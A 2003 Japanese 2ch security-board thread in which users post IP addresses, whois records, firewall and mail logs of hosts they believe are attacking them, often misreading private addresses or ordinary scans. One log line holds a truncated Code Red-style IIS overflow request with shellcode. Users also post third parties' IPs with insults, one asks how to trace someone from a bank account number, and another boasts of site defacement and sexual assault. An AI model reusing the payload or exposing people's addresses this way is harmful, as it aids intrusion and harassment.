NameServer: DNS1.CP.MSFT.NET
NameServer: DNS2.CP.MSFT.NET
NameServer: DNS1.TK.MSFT.NET
NameServer: DNS1.DC.MSFT.NET
NameServer: DNS1.SJ.MSFT.NET
Comment:
RegDate: 2001-02-14
Updated: 2002-12-05
80.139.160.66

漏れを攻撃するやつはドイツのどいつじゃ?
760名無しさん@お腹いっぱい。:03/08/25 23:27
218.221.219.234

木馬野郎
761::03/08/26 00:13
やだなー。カナダのオタたちがバックドアなげてくるよー
家のノートン先生も怒りっぱなし・・・・・
しかもたまにIP偽造してる人達まで・・・(藁
被害妄想はやめれ。
たいていバカプログラムに感染するようなアフォPCから
無差別に送られてくるだけだ。
あんたらも(あんたらの言う)攻撃仕掛けてるかもしれんのに。

つーか1がろくに調べんと書いてたのには…
そりゃ一応ウィルスからアタックされてるが。

>>753
禿同。
763:03/08/26 02:48
よくわかっていないのでKerioでaskにしてるんだけど、
さっき、(なんとか).army.milからポート99になんか来たので慌ててDenyした
こういうのって詐称?

ちなみに
ttp://www.army.mil/
落ちてます?pingも帰ってこない
764763:03/08/26 03:16
訂正:99から来たんだったかも・・
TCP/IP Kernel Driver向けだったはず・・
ログが残ってなくてヘタレですみません。
765名無しさん@お腹いっぱい。:03/08/26 04:01
郵便局の口座番号から住所や名前ってわかりますかねー?
そいつにある事情(だいたい予想はつくと思いますが)により
五万円騙しとられたみたいな感じなんです。
766763:03/08/26 10:26
ttp://www.zdnet.co.jp/enterprise/0308/22/epn04.html

>複数の通信社が伝えるところでは、国防総省と軍部でも、Sobig.FとNachiの両方の感染が起きている

もしかしてこれですかな。
つーか誰か反応欲しかった。。


>>765
口座名義はわかるだろ。
詐欺なら警察へ。
>>766
SobigFの解説をちゃんと読め
YBBは全部拒否に登録してみた。
OrgName: Comcast Cable Communications Holdings, Inc
OrgID: CCCH-3
Address: 3 Executive Campus
Address: 5th Campus
City: Cherry Hill
StateProv: NJ
PostalCode: 08002
Country: US

NetRange: 24.125.0.0 - 24.125.127.255
CIDR: 24.125.0.0/17
NetName: CCCH3-20
NetHandle: NET-24-125-0-0-1
Parent: NET-24-0-0-0-0
NetType: Direct Allocation
NameServer: NS4.ATTBB.NET
NameServer: NS5.ATTBB.NET
NameServer: NS6.ATTBB.NET
Comment:
RegDate:
Updated: 2003-08-19

OrgAbuseHandle: NAPO-ARIN
OrgAbuseName: Network Abuse and Policy Observance
OrgAbusePhone: +1-856-317-7272
OrgAbuseEmail: [email protected]

OrgTechHandle: IC161-ARIN
OrgTechName: Comcast Cable Communications, Inc.
OrgTechPhone: +1-856-317-7300
OrgTechEmail: [email protected]
770名無しさん@お腹いっぱい。:03/08/28 17:41
219.182.184.1

yahooBB219182184001.bbtec.net

ハッカーの方居ましたら宜しく。
HD MB乗せ変えなんであぼ〜んOKです。
ドコまで出来るの?
ここは私怨厨房の肥溜めです。
61.203.207.171
773殺していいよ:03/08/29 05:57
2003/08/29 5:53:39通信の要求211.10.246.154TCP(1050)
2003/08/29 5:51:39通信の要求211.10.246.154TCP(1050)
2003/08/29 5:49:39通信の要求211.10.246.154TCP(1050)
2003/08/29 5:47:39通信の要求211.10.246.154TCP(1050)

本当にしつこい
206.112.112.70
 リアルタイムでやられてる者です。どうにかなんない?基地外
>>774
俺はお前が基地外だいと思う
776名無しさん@編集中:03/08/30 02:07
216.17.74.50:18800
>>775
なんで?これって実は何も危険のないアクセスなの?だとしたらたしかに
俺はバカだ。(笑
206.112.112.70
死ねや、カスが。
210.190.142.73
本当にしつこい。どっかいけ。
780あぼーん:あぼーん
あぼーん
781名無しさん@お腹いっぱい。:03/09/03 05:25
わずか20分の間に1000回を越えるアタック。
許せない。
65-70-160-129.tklaw.com
ついに2000回を越えたわけだが・・・
コイツ一つだけでログが膨大に・・・
同時進行で
HSE-QuebecCity-ppp84103.qc.sympatico.caも1400を超えるアタック。
もう寝よ・・・。
セキュ板の華やねここは
785名無しさん@お腹いっぱい。:03/09/03 13:45
時間, イベント, 侵入者, 侵入者の IP, 発信元ポート, 宛先ポート, カウント
2003/09/03 13:20:39, DNS_NonInternet, 61.25.250.14, 61.25.250.14, 53, 4429, 2337
2003/09/03 13:20:42, DNS_Format_String, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4429, 271
2003/09/03 13:20:44, DNS_Format_String, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4429, 261
2003/09/03 13:20:47, DNS_Format_String, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4429, 847
2003/09/03 13:20:47, DNS_Hostname_Overflow, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4429, 367
2003/09/03 13:20:47, DNS_NonInternet, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4429, 26162
2003/09/03 13:20:54, DNS_NonInternet, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4429, 8429
2003/09/03 13:20:57, DNS_Format_String, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4429, 298
2003/09/03 13:20:58, DNS_Format_String, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4429, 419
2003/09/03 13:21:01, DNS_Format_String, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4429, 792
2003/09/03 13:21:01, DNS_Hostname_Overflow, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4429, 380
2003/09/03 13:21:01, DNS_NonInternet, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4429, 25228
2003/09/03 13:26:29, DNS_NonInternet, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4495, 892

通報しますた
786名無しさん@お腹いっぱい。:03/09/03 23:27
169.254.0.8 からNBT 又は Microsoft-DS パケットのルーティング UDPポート:138

で、1分間に100を越えるログが…


それが納まったら135に猛然とアタック〜。
ログが溜まりまくり〜ホホホホヽ( ´▽` )ノオネーサンオドッチャウワ♪

787名無しさん@お腹いっぱい。:03/09/04 19:14
gateway.zd-mb.si しつこい。
たった15分間で950を超えるアタック。

あーもう。
788名無しさん@お腹いっぱい。:03/09/04 23:27
踏み台やら串使って、アタックしてきたIPから、
どうやって生IPが特定できるのでしょうか?
IPから追跡しても相当な数の踏み台を介してアタックされるので…。
よければ方法を教えてください。
そもそもこれらどこのデータ張ってるんですか?


z30.219-103-217.ppp.wakwak.ne.jp
p3119-ipbf05marunouchi.tokyo.ocn.ne.jp
p2133-ipadfx01maru.tokyo.ocn.ne.jp
SMNfi-01p1-41.ppp11.odn.ad.jp
host-B098.kakita.ne.jp

もーうざい
790名無しさん@お腹いっぱい。:03/09/04 23:30
>>789
この情報どこで調べたの?
791名無しさん@お腹いっぱい。:03/09/04 23:33
>>789
まさかfirewallじゃないよね?
792あぼーん:あぼーん
あぼーん
793名無しさん@お腹いっぱい。:03/09/05 10:24
時間, イベント, 侵入者, 侵入者の IP, 発信元ポート, 宛先ポート, カウント
2003/09/05 10:14:50, DNS_Hostname_Overflow, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4406, 24
2003/09/05 10:14:51, DNS_Format_String, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4406, 25
2003/09/05 10:14:51, DNS_Hostname_Overflow, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4406, 12
2003/09/05 10:14:52, DNS_Format_String, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4406, 10
2003/09/05 10:14:52, DNS_Hostname_Overflow, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4406, 13
2003/09/05 10:14:52, DNS_Hostname_Overflow, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4406, 48
2003/09/05 10:14:52, DNS_Format_String, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4406, 59
2003/09/05 10:14:52, DNS_Format_String, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4406, 5
2003/09/05 10:14:52, DNS_Hostname_Overflow, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4406, 5
2003/09/05 10:15:02, DNS_Format_String, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4406, 1
2003/09/05 10:15:04, DNS_Hostname_Overflow, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4406, 1
2003/09/05 10:15:07, DNS_NonInternet, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4406, 1921

またきた
氏ね
794名無しさん@お腹いっぱい。:03/09/05 14:48

 カウント, 時間, イベント, 侵入者, 侵入者の IP, 宛先ポート, 発信元ポート
 5, 2003/09/05 14:01:44, ICMP_Subnet_Mask_Request, pl022.nas931.m-hiroshima.nttpc.ne.j○, 61.197.87.22, 0, 17
 2, 2003/09/05 14:01:34, UDP_Probe_Other, pl022.nas931.m-hiroshima.nttpc.ne.j○, 61.197.87.22, 51294, 69
●1159, 2003/09/05 13:00:37, TCP_Port_Scan, pl022.nas931.m-hiroshima.nttpc.ne.j○, 61.197.87.22, 539, 4534

誰かこのDQNを止めてくれ
アタッカーって何のためにそんな(1分間に100ですか?)ことやるんですかね
余程の暇人かと。
796名無しさん@お腹いっぱい。:03/09/06 11:19
アタッカーがされたかどうかのログはどこで見れるのですか?
1 192.168.1.1 0 ms
3 10.26.1.67 16 ms
4 10.26.253.20 15 ms
5 10.26.1.121 16 ms
6 10.0.26.129 15 ms
7 10.9.17.145 203 ms
8 202.213.198.169 16 ms
9 202.213.193.82 31 ms
10 202.213.193.188 31 ms
11 61.211.63.132 16 ms
12 61.211.63.70 32 ms
13 219.98.13.95 46 ms

ルート見ててる(´_ゝ`)
798名無しさん@お腹いっぱい。:03/09/06 20:53
>>758
Microsoftにアタックされるなんて、あなた何したんですか?
799名無しさん@お腹いっぱい。:03/09/06 21:11
219.106.178.149

135 共有ポートにしつこく毎日やってくる

殺してください
800名無しさん@お腹いっぱい。:03/09/06 21:50
800
2003/09/07 00:37:06 66.220.17.151:80 (151.17.220.66.in-addr.arpa) xxx.xxx.xxx.xxx:1306 ポート 1306 (TCP)

毎日〜IP変えてがんばるなぁ、こいつ。
Sep 6 23:59:58 SRC=66.117.15.44 PROTO=TCP SPT=2960 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0
Sep 7 00:00:01 SRC=66.117.15.44 PROTO=TCP SPT=2960 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0
Sep 7 00:00:08 SRC=66.117.15.44 PROTO=TCP SPT=2960 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0
Sep 7 00:00:26 SRC=66.117.15.44 PROTO=TCP SPT=4707 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0
Sep 7 00:00:29 SRC=66.117.15.44 PROTO=TCP SPT=4707 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0
Sep 7 00:00:36 SRC=66.117.15.44 PROTO=TCP SPT=4707 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0
Sep 7 00:00:54 SRC=66.117.15.44 PROTO=TCP SPT=2465 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0
Sep 7 00:00:58 SRC=66.117.15.44 PROTO=TCP SPT=2465 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0
Sep 7 00:01:04 SRC=66.117.15.44 PROTO=TCP SPT=2465 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0
Sep 7 00:53:15 SRC=66.117.15.44 PROTO=TCP SPT=3501 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0
Sep 7 00:53:18 SRC=66.117.15.44 PROTO=TCP SPT=3501 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0
Sep 7 00:53:24 SRC=66.117.15.44 PROTO=TCP SPT=3501 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0
Sep 7 00:53:47 SRC=66.117.15.44 PROTO=TCP SPT=4723 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0
Sep 7 00:53:50 SRC=66.117.15.44 PROTO=TCP SPT=4723 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0
Sep 7 00:53:56 SRC=66.117.15.44 PROTO=TCP SPT=4723 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0
Sep 7 00:54:14 SRC=66.117.15.44 PROTO=TCP SPT=1693 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0
Sep 7 00:54:17 SRC=66.117.15.44 PROTO=TCP SPT=1693 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0
Sep 7 00:54:24 SRC=66.117.15.44 PROTO=TCP SPT=1693 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0

こういうのって、普通の出来事なんでしょうか?
219.164.197.169
10.6.47.243
OrgName: Internet Assigned Numbers Authority
OrgID: IANA
Address: 4676 Admiralty Way, Suite 330
City: Marina del Rey
StateProv: CA
PostalCode: 90292-6695
Country: US
NetRange: 10.0.0.0 - 10.255.255.255
CIDR: 10.0.0.0/8
NetName: RESERVED-10
NetHandle: NET-10-0-0-0-1
Parent:
NetType: IANA Special Use
NameServer: BLACKHOLE-1.IANA.ORG
NameServer: BLACKHOLE-2.IANA.ORG
Comment: This block is reserved for special purposes.
Comment: Please see RFC 1918 for additional information.
Comment:
RegDate:
Updated: 2002-09-12
OrgAbuseHandle: IANA-IP-ARIN
OrgAbuseName: Internet Corporation for Assigned Names and Number
OrgAbusePhone: +1-310-301-5820
OrgAbuseEmail: [email protected]

OrgTechHandle: IANA-IP-ARIN
OrgTechName: Internet Corporation for Assigned Names and Number
OrgTechPhone: +1-310-301-5820
OrgTechEmail: [email protected]

805名無しさん@お腹いっぱい。:03/09/08 10:56
03/09/08 午前 9:20:12通信の要求211.196.154.209TCP(1509)
806名無しさん@お腹いっぱい。:03/09/08 21:43
>>756
 
  a1021.lm.a.yimg.com
  a211-10-246-138.deploy.akamaitechnologies.com

 こいつらって何なの?知ってるの?
  
>>806
akamaitechnologies.comはyahooにアクセスするとき通信してるみたいだったけど。
808名無しさん@お腹いっぱい。:03/09/08 22:45
a211-10-246-138.deploy.akamaitechnologies.com
こいつのポートスキャン激しくウザイんだよ、しかも
ログを見ると”a1021.lm.a.yimg.com” こいつと、つるんでるみたいだから
もうIPレンジでフィルタかけたんだけど。
220.211.223.77:7743 (pd3df4d.ykhmac00.ap.so-net.ne.jp)
218.43.134.43:1268 (p4043-ipad12sasajima.aichi.ocn.ne.jp)
218.220.192.72:26497 (zaqdadcc048.zaq.ne.jp)
61.192.98.175:17265 (zaq3dc062af.zaq.ne.jp)
>>806
akamaitechnologies.com
ごくフツーの人にはあまり知られていないが、ちょー凄い集団だ。
かなりの数のマシンを持っており、保持するIPも広範囲。
もし本当に攻撃されれば、もうだめぽ。

なぜかスキャンされてるといった程度なら、放置汁。
内部からのアクセスによる情報漏れが禿しく気になるのであれば
IPを遮断するしかない。
811808:03/09/09 09:11
ほんと複数のIPでそれぞれ同じことを同時にしてくるから
うざくて。
812808:03/09/09 16:11
akamaitechnologies.comってサンスポやZAKZAKの入ってる鯖やじゃないの?
>>808
こんな糞スレに書き込むから馬鹿にされちゃうんだよ。

whois -h whois.opensrs.net akamaitechnologies.comすりゃ
akamaitechnologies.comを誰が持っているかわかるわけだ。
んでもって、http://www.akamai.com/に行けば日本語のサイトがhttp://www.akamai.co.jp/だとわかるわけだ
どういう事をやってる企業か調べてみろ。
814808:03/09/10 10:11
>>813よ、俺のところにアタックしに来ていたのは、ここを踏み台にしていた「夏厨」じゃなくて、
「eビジネスで飯を食ってるやつらが串も刺さずにやってきた!」と言うことか?

FWIN,2003/09/08,18:44:58 +9:00 GMT,211.10.246.139:80,192.168.1.100:2872,TCP (flags:S)
FWIN,2003/09/08,18:45:42 +9:00 GMT,211.10.246.144:80,192.168.1.100:2859,TCP (flags:S)
FWIN,2003/09/08,18:46:02 +9:00 GMT,211.10.246.144:80,192.168.1.100:2903,TCP (flags:S)
FWIN,2003/09/08,18:46:12 +9:00 GMT,211.10.246.144:80,192.168.1.100:2964,TCP (flags:S)
FWIN,2003/09/08,18:46:16 +9:00 GMT,211.10.246.139:80,192.168.1.100:2948,TCP (flags:S)
FWIN,2003/09/08,18:46:42 +9:00 GMT,211.10.246.144:80,192.168.1.100:2902,TCP (flags:S)
FWIN,2003/09/08,18:46:48 +9:00 GMT,211.10.246.144:80,192.168.1.100:2868,TCP (flags:S)
FWIN,2003/09/08,18:46:48 +9:00 GMT,211.10.246.139:80,192.168.1.100:2952,TCP (flags:S)
FWIN,2003/09/08,18:46:56 +9:00 GMT,211.10.246.139:80,192.168.1.100:2773,TCP (flags:S)
FWIN,2003/09/08,18:46:58 +9:00 GMT,211.10.246.139:80,192.168.1.100:2872,TCP (flags:S)
FWIN,2003/09/08,18:47:02 +9:00 GMT,211.10.246.139:80,192.168.1.100:2894,TCP (flags:S)
FWIN,2003/09/08,18:47:04 +9:00 GMT,211.10.246.139:80,192.168.1.100:2879,TCP (flags:S)
FWIN,2003/09/08,18:47:40 +9:00 GMT,211.10.246.139:80,192.168.1.100:2954,TCP (flags:S)
815●のテストカキコ中:03/09/10 10:17
http://ula2ch.muvc.net/ (このカキコは削除しても良いです)
202.212.115.106
211.5.1.243

uzeeeeeeeeeee
>>814
それは、ウェブのアクセスの戻りのパケットを誤認したと見せかけた
ポートスキャンに違いない。
攻撃されたので
一応晒しときまつ

211.1.235.247
明石らしいですが・・・

お心当たりの方は

↓ に、お問い合わせを。
03/08/24 20:33 HOST:61-195-150-89.cust.bit-drive.ne.jp

2ch日本史で何回も事実無根の誹謗中傷を書き立てるなよ!
個人サイトにも、1日に10回もアクセスしたりして・・・
821名無しさん@お腹いっぱい。:03/09/12 03:38
>>808
お前は攻撃される価値があるのか?
俺には攻撃される価値があるなぁ。
823名無しさん@お腹いっぱい。:03/09/12 17:38
これでも荒らし界のネ申でしたので。
サイト改ざんまでした事あるけど捕まらなかった。
知り合いが鯖関係者なんでね。色々情報変えてくれたんだよ。
ネットで出会った女、犯したけど捕まらなかった。
BOT配布ごときで捕まることはないでしょう。

俺に文句言いたけりゃ生で来てくれ。
お前等に俺を叩く権利ないって事で削除&そのIPは規制(プ

http://www.geocities.co.jp/SiliconValley-PaloAlto/4733/
zaqd38758b9.zaq.ne.jp
211.135.88.185
825名無しさん@お腹いっぱい。:03/09/14 01:02
IPアドレス 219.160.209.208
ホスト名 p3208-ipad02otsu.shiga.ocn.ne.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 滋賀県
市外局番 --
接続回線 xDSL
826名無しさん@お腹いっぱい。:03/09/14 01:03
IPアドレス 219.160.209.208
ホスト名 p3208-ipad02otsu.shiga.ocn.ne.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 滋賀県
市外局番 --
接続回線 xDSL
827名無しさん@お腹いっぱい。:03/09/14 09:26
220.209.99.105
828名無しさん@お腹いっぱい。:03/09/14 15:26
220.209.99.105

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 220.209.75.0-220.209.182.0
b. [ネットワーク名] INFOWEB
f. [組織名] InfoWeb(富士通株式会社)
g. [Organization] InfoWeb(Fujitsu Ltd.)

粘着アタッカー
32.103.25.252[slip-32-103-25-252.ca.us.preserv.net]
侵入:Invalid TCP Source Port

いつもはトロイの木馬が多いのに、珍しいな。
830名無しさん@お腹いっぱい。:03/09/14 20:17
218.178.238.35

831名無しさん@お腹いっぱい。:03/09/14 23:10
んで・・・、
何度も言うようだけど踏み台晒してなんか楽しい?
832名無しさん@お腹いっぱい。:03/09/14 23:21
みなさんアタックされたらどうしてるのですか?
報復するのですか?
攻撃とは限らない。ただのポートスキャンに一々反応してられるか。
俺、暇なときはポートスキャン返してるけどなぁ。
挨拶されたら挨拶返しなさいと、死んだばぁちゃんも言ってたし。
むしろ、通行人と目が合っただけで挨拶してるよう。
219.12.116.51
129.71.16.159
838名無しさん@お腹いっぱい。:03/09/18 01:50
 ポートをブロックするプログラムをいれてますが
2ちゃんを閲覧していたら、2ちゃんのアドレス
64.71.145.43(2ch.net)から自マシンの
ポート2770と2766に対するアクセスが2件ありました。

こういったことがある方他に居られるでしょうか?
またどういった原因が考えられますでしょうか。
81.218.189.14
24.154.111.127
841名無しさん@お腹いっぱい。:03/09/18 07:06
220.104.1.107
842名無しさん@お腹いっぱい。:03/09/19 19:24
(1)
Received: from remt21.cluster1.charter.net (remt21.cluster1.charter.net [209.225.8.31])by mail512.nifty.com with ESMTP id h8J6HdF9012653
 for <******>; Fri, 19 Sep 2003 15:17:39 +0900
Received: from [66.168.197.67] (HELO mkid)
           ~~~~~~~~~~~~~
  by remt21.cluster1.charter.net (CommuniGate Pro SMTP 4.0.6)
  with SMTP id 163170716; Fri, 19 Sep 2003 02:17:22 -0400

(2)
Received: from remt30.cluster1.charter.net (remt30.cluster1.charter.net [209.225.8.40])by mail522.nifty.com with ESMTP id h8J6FO97012818
 for <******>; Fri, 19 Sep 2003 15:15:25 +0900
Received: from [66.168.197.67] (HELO uugmgp)
           ~~~~~~~~~~~~~
  by remt30.cluster1.charter.net (CommuniGate Pro SMTP 4.0.6)
  with SMTP id 32267368; Fri, 19 Sep 2003 02:15:03 -0400

(3)
Received: from mta03-svc.ntlworld.com (mta03-svc.ntlworld.com [62.253.162.43])by mail523.nifty.com with ESMTP id h8CLQcXc012010
 for <******>; Sat, 13 Sep 2003 06:26:39 +0900
Received: from DrJiR ([80.5.46.35]) by mta03-svc.ntlworld.com
               ~~~~~~~~~~
  (InterMail vM.4.01.03.37 201-229-121-137-20020806) with SMTP
  id <20030912212620.GKNK19737.mta03-svc.ntlworld.com@DrJiR>;
  Fri, 12 Sep 2003 22:26:20 +0100
843名無しさん@お腹いっぱい。:03/09/19 19:26
(4)
Received: from rwcrmhc11.comcast.net (rwcrmhc11.comcast.net [204.127.198.35])by mail507.nifty.com with ESMTP id h7E0EG18008557
 for <******>; Thu, 14 Aug 2003 09:14:16 +0900
Message-Id: <******@mail507.nifty.com>
Date: Thu, 14 Aug 2003 00:14:05 +0000 (GMT)
X-Comment: Sending client does not conform to RFC822 minimum requirements
X-Comment: Date has been added by Maillennium.
Received: from kkmUQ (12-241-35-137.client.attbi.com[12.241.35.137](untrusted sender))
                                    ~~~~~~~~~~~~~
  by comcast.net (rwcrmhc11) with SMTP
  id <20030814001359013006k5h8e>; Thu, 14 Aug 2003 00:14:03 +0000

(5)
Received: from rwcrmhc11.comcast.net (rwcrmhc11.comcast.net [204.127.198.35])by mail507.nifty.com with ESMTP id h7E0EG18008557
 for <******>; Thu, 14 Aug 2003 09:14:16 +0900
Message-Id: <******@mail507.nifty.com>
Date: Thu, 14 Aug 2003 00:14:05 +0000 (GMT)
X-Comment: Sending client does not conform to RFC822 minimum requirements
X-Comment: Date has been added by Maillennium.
Received: from kkmUQ (12-241-35-137.client.attbi.com[12.241.35.137](untrusted sender))
                                    ~~~~~~~~~~~~~~
  by comcast.net (rwcrmhc11) with SMTP
  id <20030814001359013006k5h8e>; Thu, 14 Aug 2003 00:14:03 +0000
(6)
Received: from allcom.gdynia.pl (mail.allcom.gdynia.pl [193.91.30.26])by mail521.nifty.com with ESMTP id h8JBp6xJ001141
                                   ~~~~~~~~~~~~
 for <******>; Fri, 19 Sep 2003 20:51:15 +0900
Received: from localhost (localhost [127.0.0.1])
 by allcom.gdynia.pl (Postfix) with ESMTP
 id 8CC1D7FC70; Fri, 19 Sep 2003 13:48:09 +0200 (CEST)
Received: from allcom.gdynia.pl ([127.0.0.1])
  by localhost (allcom [127.0.0.1]) (amavisd-new, port 10024) with ESMTP
  id 31423-03; Fri, 19 Sep 2003 13:48:08 +0200 (CEST)
Received: from ltxgj (unknown [10.100.5.145])
 by allcom.gdynia.pl (Postfix) with SMTP
 id 325957FC66; Fri, 19 Sep 2003 13:48:08 +0200 (CEST)
pcd383230.netvigator.com
846名無しさん@お腹いっぱい。:03/09/19 21:36
Internet Assigned Numbers Authority

これってどこの会社だよ。
激しくうざいんだけど
(7)
Received: by mail54.nifty.com id 3f6b3d6b5fe34e;
 Sat, 20 Sep 2003 02:31:23 +0900
Received: from ms-smtp-01.southeast.rr.com (ms-smtp-01.southeast.rr.com [24.93.67.82])by mail511.nifty.com with ESMTP id h8JHVGsb029649
 for <********>; Sat, 20 Sep 2003 02:31:17 +0900
Received: from nqeflqt (clt56-125-103.carolina.rr.com [66.56.125.103])
                                   ~~~~~~~~~~~~~
 by ms-smtp-01.southeast.rr.com (8.12.5/8.12.2) with SMTP id h8JHKG0Q001412;
 Fri, 19 Sep 2003 13:20:17 -0400 (EDT)
220.108.225.230

さっきからTCP/445ばっか叩いてんじゃねえよ。
849名無しさん@お腹いっぱい。:03/09/22 21:58
127.0.0.1
このひとしつこい
>>849
それはお前のローカルアドレスだろ。
851_:03/09/22 22:51
>>849
>>850
http://pc.2ch.net/test/read.cgi/sec/1064122787/l50
うちは来たことないけど上がはじいてるのかな?
意図がいまいちわからんけどこれって結局なんだろう?
211.93.13.166
853名無しさん@お腹いっぱい。:03/09/26 02:23
会社のWeb鯖にアノニでログインしようとするんだが、何がしたいんだこの糞会社?

219.106.138.196 UNKNOWN nobody [23/Sep/2003:01:13:34 +0900] "USER anonymous" 331 -
219.106.138.196 UNKNOWN nobody [23/Sep/2003:01:13:34 +0900] "PASS (hidden)" 530 -

[IPネットワークアドレス] 219.106.136.0-219.106.143.0
[ネットワーク名] BAI-CATV
[組織名] アイテック阪神株式会社
[Organization] ITEC HANSHIN CO.,LTD.
[運用責任者] NH183JP
[技術連絡担当者] TM947JP
[技術連絡担当者] TK588JP
[ネームサーバ] ns1.gao.ne.jp
[ネームサーバ] ns2.gao.ne.jp
[通知アドレス] [email protected]
カスども、まだやってるのか?
68.20.216.234
856名無しさん@お腹いっぱい。:03/09/26 12:49
202.8.29.213
218.13.198.21
858名無しさん@お腹いっぱい。:03/09/27 00:56
sttldslgw9poole163.sttl.uswest.net - - [27/Sep/2003:00:39:21 +0900] "GET /frame.jpg?1064038450843 HTTP/1.0" 403 1067 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Win32)"
こういうのが約30秒おきに飛んでくる。

xx-22x-8x-15x.hinet-ip.hinet.net - - [26/Sep/2003:18:12:59 +0900]
"GET /NULL.IDA?CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%
u898b%u77e8%u0000%u0000%u838b%u0094%u0000%u408b%u0564%u0150%u0000%
ue0ff%u9090=x&\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x つづく
172.160.173.250
200.153.234.82
200-153-234-82.dsl.telesp.net.br
68.161.60.70

今晩はしつこい。
864名無しさん@お腹いっぱい。:03/09/27 22:56
韓国がウザい。
865名無しさん@お腹いっぱい。:03/09/27 23:14
SRC=220.108.220.155 LEN=48 TOS=0x00 PREC=0x00 TTL=128 ID=50649 DF PROTO=TCP SPT=3333 DPT=445 WINDOW=65535 RES=0x00 SYN URGP=0

こんな感じで30分以上。。。ログの行数数えるのも だるい。
866名無しさん@お腹いっぱい。:03/09/28 00:31
219.111.157.84

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 219.111.128.0-219.111.191.0
b. [ネットワーク名] SO-NET
f. [組織名] SO-Net サービス
g. [Organization] SO-Net Service

62.178.106.132
868fushianasan:03/09/28 10:55
210.52.154.0
869名無しさん@お腹いっぱい。:03/09/28 12:42
ブレーメンの不正侵入隊
134.102.65.110:111
81.86.202.132
65.33.228.75
68.164.56.56
IPアドレス 211.134.86.52
ホスト名 O086052.ppp.dion.ne.jp
接続回線 xDSL
61.124.67.96

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.124.0.0-61.124.255.0
b. [ネットワーク名] INFOWEB
f. [組織名] InfoWeb(富士通株式会社)
g. [Organization] InfoWeb(Fujitsu Ltd.)
875名無しさん@お腹いっぱい。:03/10/03 00:57
169.254.0.8

一ヶ月も前から日参されてうざい…。
しかも1分間に100回を越えるアタックでルーター止まるし…(←根性なし)w
横文字苦手なんで何処からやらワカラン。


OrgName: Internet Assigned Numbers Authority
OrgID: IANA
Address: 4676 Admiralty Way, Suite 330
City: Marina del Rey
StateProv: CA
PostalCode: 90292-6695
Country: US

NetRange: 169.254.0.0 - 169.254.255.255
CIDR: 169.254.0.0/16
NetName: LINKLOCAL
NetHandle: NET-169-254-0-0-1
Parent: NET-169-0-0-0-0
NetType: IANA Special Use
NameServer: BLACKHOLE-1.IANA.ORG
NameServer: BLACKHOLE-2.IANA.ORG
Comment: Please see RFC 3330 for additional information.
RegDate: 1998-01-27
Updated: 2002-10-14
>>875
馬鹿はwhois使用禁止。
>>875
ローカルアドレスとは何か勉強すると、あなたが貼ったWhoisが恥ずかしくなるよ。
61.185.218.154
880211.183.93.215:1735:03/10/03 17:34
211.183.93.215:1735
210.15.11.115
220.220.105.54
61.196.2.176
68.32.116.168
88368.248.122.13:1129:03/10/04 02:31
68.248.122.13:1129
884名無しさん@お腹いっぱい。:03/10/04 07:56
219.104.103.67

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 219.104.0.0-219.104.255.0
b. [ネットワーク名] INFOWEB
f. [組織名] InfoWeb(富士通株式会社)
g. [Organization] InfoWeb(Fujitsu Ltd.)
↑カス供死ね。
67.202.109.53
887名無しさん@お腹いっぱい。:03/10/05 00:24
>>885

オマエが死ね
888名無しさん@お腹いっぱい。:03/10/05 01:08
